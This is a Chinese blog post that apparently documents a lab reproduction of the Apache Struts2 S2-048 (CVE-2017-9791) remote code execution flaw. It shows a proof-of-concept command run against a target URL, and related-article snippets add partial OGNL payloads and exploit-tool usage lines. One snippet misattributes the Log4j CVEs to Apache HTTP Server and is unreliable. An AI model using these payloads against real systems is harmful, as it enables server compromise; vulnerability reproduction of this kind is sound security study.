Struts2-048/st2-048/CVE-2017-9791漏洞

最新推荐文章于 2022-01-04 20:06:04 发布
最新推荐文章于 2022-01-04 20:06:04 发布
阅读量740 收藏
点赞数
分类专栏: 漏洞复现 文章标签: struts2 安全漏洞 cve
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51203422/article/details/120493687
版权

GitHub - dragoneeg/Struts2-048: CVE-2017-9791

 github下载POC

python2 Struts048.py http://ip:port/integration/saveGangster.action

使用POC脚本检测, 返回值是   s2-048  EXISTS !

证明漏洞存在,命令执行成功

 

 

诚诚cheng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
S2-048 远程代码执行漏洞
锋刃科技的博客
06-29 341
影响版本 2.0.0 - 2.3.32 漏洞搭建 cd vulhub/struts2/s2-048 docker-compose up -d 环境启动后,访问http://your-ip:8080/showcase/即可查看到struts2的测试页面。 漏洞复现 访问Integration->Struts 1 Integration: 触发OGNL表达式的位置是Gangster Name这个表单。 输入${233*233}即可查看执行结果(剩下两个表单随意填写) 发
struts2漏洞利用检测工具新添加了struts-048
01-09
增加S2-048 Struts 2.3.X 支持检查官方示例struts2-showcase应用的代码执行漏洞,参考地址:http://127.0.0.1:8080/struts2-showcase/integration/saveGangster.action
Struts2再爆远程命令执行漏洞Struts2-048 Poc Shell及防御修复方案抢先看!
chengman3837的博客
07-08 235
漏洞概述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。在Struts 2.3.x 系列的 Showcase 应用中演示Struts2整合Struts 1 的插件中存在...
[Vulfocus解题系列]struts2-048 远程代码执行 (CVE-2017-9791)
00勇士王子的博客
07-11 1046
漏洞介绍 名称: struts2-048 远程代码执行 (CVE-2017-9791) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 当Struts 2中的Struts 1插件启用的情况下,攻击者通过构造恶意字段可以造成RCE 解题过程 1.打开靶场环境 2.访问漏洞存在的路径 /integration/saveGangster.actio
【研究】Struts2-048漏洞
weixin_30675247的博客
12-04 232
1.1 漏洞背景 2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值(value)通过Struts2的struts2-struts1-plugin的插件传递给被攻击主...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
2017年,一个名为CVE-2017-9805的重大漏洞被发现,它允许远程攻击者通过恶意构造的HTTP请求头注入任意的OGNL表达式,从而执行服务器端代码,这可能导致数据泄露、系统权限提升甚至完全控制服务器。 "struts2-scan...
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
CVE-2017-5638 是S2-045漏洞的官方CVE编号,这表明了它是一个被广泛认可的安全漏洞。当Struts2尝试解析非标准的MIME类型时,比如“multipart/form-data; boundary=----WebKitFormBoundary”这类格式,如果没有正确...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
struts2-048漏洞验证工具
02-27
struts2-048漏洞验证工具。PYthon脚本,python st2-048.py启动即可
漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
chengli1824的博客
07-11 533
了解更多技术文章请点击原文链接 2017年7月7日,ApacheStruts发布最新的安全公告,漏洞编号为S2-048,该漏洞存在Struts2和Struts1一个Showcase插件Action Message类中,通过构建不可信的输入实现远程命令攻击,存在安全风险。 具体详情如下...
struts2-048漏洞复现
qq_46804551的博客
04-08 152
搭建 访问成功 复现 . 在浏览器输入以下链接访问漏洞页面 http://your-ip:8080/integration/saveGangster.action 在表单中填入如上,主要第一个表单其他可以随便乱写,点解submit 在Gangster Name”处把${1+1}修改为以下命令执行的payload语句 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
Struts2_048_RCE CVE-2017-9791 漏洞复现
ADummy的博客
02-19 924
Struts2_048_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行 0x01漏洞介绍 ​ 在Struts 2.3.x 版本上的Showcase 插件ActionMessage类中,通过构建不可信的输入可实现远程命令攻击。漏洞成因是当ActionMessage接收客户可控的参数数据时,由于后续数据拼接传递后处理不当导致任意代码执行。 ​ 影响版本 2.3.x 0x02漏洞复现 payload1(RC
struts2 代码执行 (CVE-2017-9791)
个人笔记
08-31 353
struts2 代码执行 (CVE-2017-9791) #!/usr/bin/python # -*- coding: utf-8 -*- import json,re import requests import threading import urllib def Poc(url,command): header = {'Content-Type': 'application/x-www-form-urlencoded'} poc = {"name":"%{(#szgx='mu
技术分析 | Struts2 S2-048漏洞:跟踪攻击趋势,成功检测防御
weixin_33888907的博客
07-10 438
7月7日,Apache Struts官方发布了漏洞编号为:S2-048的高危漏洞公告。 阿里云安全团队2小时内发布官方安全建议,跟踪S2-048的全球攻击趋势,并对不同漏洞版本进行了对比分析。 目前,阿里云云盾态势感知已支持检测,WAF默认支持防御。 一、影响范围 如果在ApacheStruts 2.3.x系列中启用了struts2-struts1-...
Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP
qq_51459600的博客
01-04 2644
Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP 官方描述: It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using u
使用Docker搭建Struts2-048漏洞环境及Python PoC验证
Mi1k7ea
08-07 4483
这次是继续使用Docker搭建Struts2-048漏洞环境,并且利用PoC进行测试。 生成容器: 直接使用上次制好的镜像ubuntu_aliyun:1.0,直接生成容器: docker run -it -d --name struts2-048 -p 8088:8080 ubuntu_aliyun:1.0 注意点就是Tomcat的默认端口为8080,因而端口要映射到8080。
(s2-048)Struts2 反序列化漏洞
weixin_45253622的博客
12-14 1228
Struts2 Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。 漏洞复现
CVE-2021-45105/CVE-2021-44228
最新发布
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器上受限制的文件。CVE-2021-44228是一个HTTP请求解析漏洞,攻击者可以通过发送恶意的请求导致服务器崩溃或远程代码执行。 为了保护系统安全,建议及时升级Apache HTTP Server到最新版本,并遵循相关安全建议和最佳实践。如果你是系统管理员或开发人员,可以查看Apache官方发布的安全公告,获取更详细的信息和修复方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值